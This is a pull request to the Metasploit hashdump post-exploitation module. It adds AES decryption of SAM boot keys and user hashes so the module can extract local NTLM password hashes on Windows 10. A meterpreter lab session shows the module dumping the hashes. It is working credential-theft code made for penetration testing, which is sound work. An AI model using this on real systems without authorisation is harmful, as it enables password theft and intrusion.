### PR TITLE
Make hashdump module work with Windows 10

### DIFF
--- a/modules/post/windows/gather/hashdump.rb
+++ b/modules/post/windows/gather/hashdump.rb
@@ -139,14 +139,29 @@ class MetasploitModule < Msf::Post
     vf = vf.data
     ok.close
 
-    hash = Digest::MD5.new
-    hash.update(vf[0x70, 16] + @sam_qwerty + bootkey + @sam_numeric)
+    revision = vf[0x68, 4].unpack('V')[0]
 
-    rc4 = OpenSSL::Cipher.new("rc4")
-    rc4.key = hash.digest
-    hbootkey  = rc4.update(vf[0x80, 32])
-    hbootkey << rc4.final
-    return hbootkey
+    if revision == 1
+      hash = Digest::MD5.new
+      hash.update(vf[0x70, 16] + @sam_qwerty + bootkey + @sam_numeric)
+
+      rc4 = OpenSSL::Cipher.new("rc4")
+      rc4.key = hash.digest
+      hbootkey  = rc4.update(vf[0x80, 32])
+      hbootkey << rc4.final
+      return hbootkey
+    end
+
+    if revision == 2
+      aes = OpenSSL::Cipher.new('aes-128-cbc')
+      aes.key = bootkey
+      aes.padding = 0
+      aes.decrypt
+      aes.iv = vf[0x78, 16]
+      return aes.update(vf[0x88, 16]) # we need only 16 bytes
+    end
+
+    raise NotImplementedError, "Unknown hboot_key revision: #{revision}"
   end
 
   def capture_user_keys
@@ -200,21 +215,16 @@ class MetasploitModule < Msf::Post
     users.each_key do |rid|
       user = users[rid]
 
-      hashlm_enc = ""
-      hashnt_enc = ""
+      hashlm_off = user[:V][0x9c, 4].unpack("V")[0] + 0xcc
+      hashlm_len = user[:V][0xa0, 4].unpack("V")[0]
+      hashlm_enc = user[:V][hashlm_off, hashlm_len]
 
-      hoff = user[:V][0x9c, 4].unpack("V")[0] + 0xcc
+      hashnt_off = user[:V][0xa8, 4].unpack("V")[0] + 0xcc
+      hashnt_len = user[:V][0xac, 4].unpack("V")[0]
+      hashnt_enc = user[:V][hashnt_off, hashnt_len]
 
-      #Check if hashes exist (if 20, then we've got a hash)
-      lm_exists = user[:V][0x9c+4,4].unpack("V")[0] == 20 ? true : false
-      nt_exists = user[:V][0x9c+16,4].unpack("V")[0] == 20 ? true : false
-
-      #If we have a hashes, then parse them (Note: NT is dependant on LM)
-      hashlm_enc = user[:V][hoff + 4, 16] if lm_exists
-      hashnt_enc = user[:V][(hoff + (lm_exists ? 24 : 8)), 16] if nt_exists
-
-      user[:hashlm] = decrypt_user_hash(rid, hbootkey, hashlm_enc, @sam_lmpass)
-      user[:hashnt] = decrypt_user_hash(rid, hbootkey, hashnt_enc, @sam_ntpass)
+      user[:hashlm] = decrypt_user_hash(rid, hbootkey, hashlm_enc, @sam_lmpass, @sam_empty_lm)
+      user[:hashnt] = decrypt_user_hash(rid, hbootkey, hashnt_enc, @sam_ntpass, @sam_empty_nt)
     end
 
     users
@@ -241,16 +251,37 @@ class MetasploitModule < Msf::Post
     [convert_des_56_to_64(s1), convert_des_56_to_64(s2)]
   end
 
-  def decrypt_user_hash(rid, hbootkey, enchash, pass)
+  def decrypt_user_hash(rid, hbootkey, enchash, pass, default)
+    revision = enchash[2, 2].unpack('v')[0]
 
-    if(enchash.empty?)
-      case pass
-      when @sam_lmpass
-        return @sam_empty_lm
-      when @sam_ntpass
-        return @sam_empty_nt
+    if revision == 1
+      if enchash.length < 20
+        return default
       end
-      return ""
+
+      md5 = Digest::MD5.new
+      md5.update(hbootkey[0,16] + [rid].pack("V") + pass)
+
+      rc4 = OpenSSL::Cipher.new('rc4')
+      rc4.key = md5.digest
+      okey = rc4.update(enchash[4, 16])
+
+    elsif revision == 2
+      if enchash.length < 40
+        return default
+      end
+
+      aes = OpenSSL::Cipher.new('aes-128-cbc')
+      aes.key = hbootkey[0, 16]
+      aes.padding = 0
+      aes.decrypt
+      aes.iv = enchash[8, 16]
+      okey = aes.update(enchash[24, 16]) # we need only 16 bytes
+
+    else
+      print_error("Unknown user hash revision: #{revision}")
+      return default
+
     end
 
     des_k1, des_k2 = rid_to_key(rid)
@@ -262,13 +293,6 @@ class MetasploitModule < Msf::Post
     d2 = OpenSSL::Cipher.new('des-ecb')
     d2.padding = 0
     d2.key = des_k2
-
-    md5 = Digest::MD5.new
-    md5.update(hbootkey[0,16] + [rid].pack("V") + pass)
-
-    rc4 = OpenSSL::Cipher.new('rc4')
-    rc4.key = md5.digest
-    okey = rc4.update(enchash)
 
     d1o  = d1.decrypt.update(okey[0,8])
     d1o << d1.final


### PR DESCRIPTION
Currently the hashdump module does not work on Windows 10, where all hash output are empty. See #7936.

Example (all hash empty on Windows 10):
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```

I've followed closely mimikatz's code to implement this pull request (which has been working with Windows 10 [for 10 months](https://github.com/gentilkiwi/mimikatz/commit/823d376d8044e112acd1e03225a5eba0e97d0397) already!).

I would appreciate some code review since I've never written any Ruby before 😬 

I've confirmed this PR working on:

 * Windows XP
 * Windows Vista
 * Windows 7
 * Windows 10 (well, that was the point)
 * Windows 2012


## Verification

 * Get a meterpreter session
 * Get system
 * `run post/windows/gather/hashdump`
 * Make sure that the hash match the passwords of the local users

_Note that this PR should only change (i.e. fix) the output on Windows 10._

## Example

```
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : LAB
Logged On Users : 6
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 99cba3f699f5444ec3e74266dfe356e1...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
```

Notice that this time, the NT hash of users Administrator, IEUser and ssh_server are no longer empty.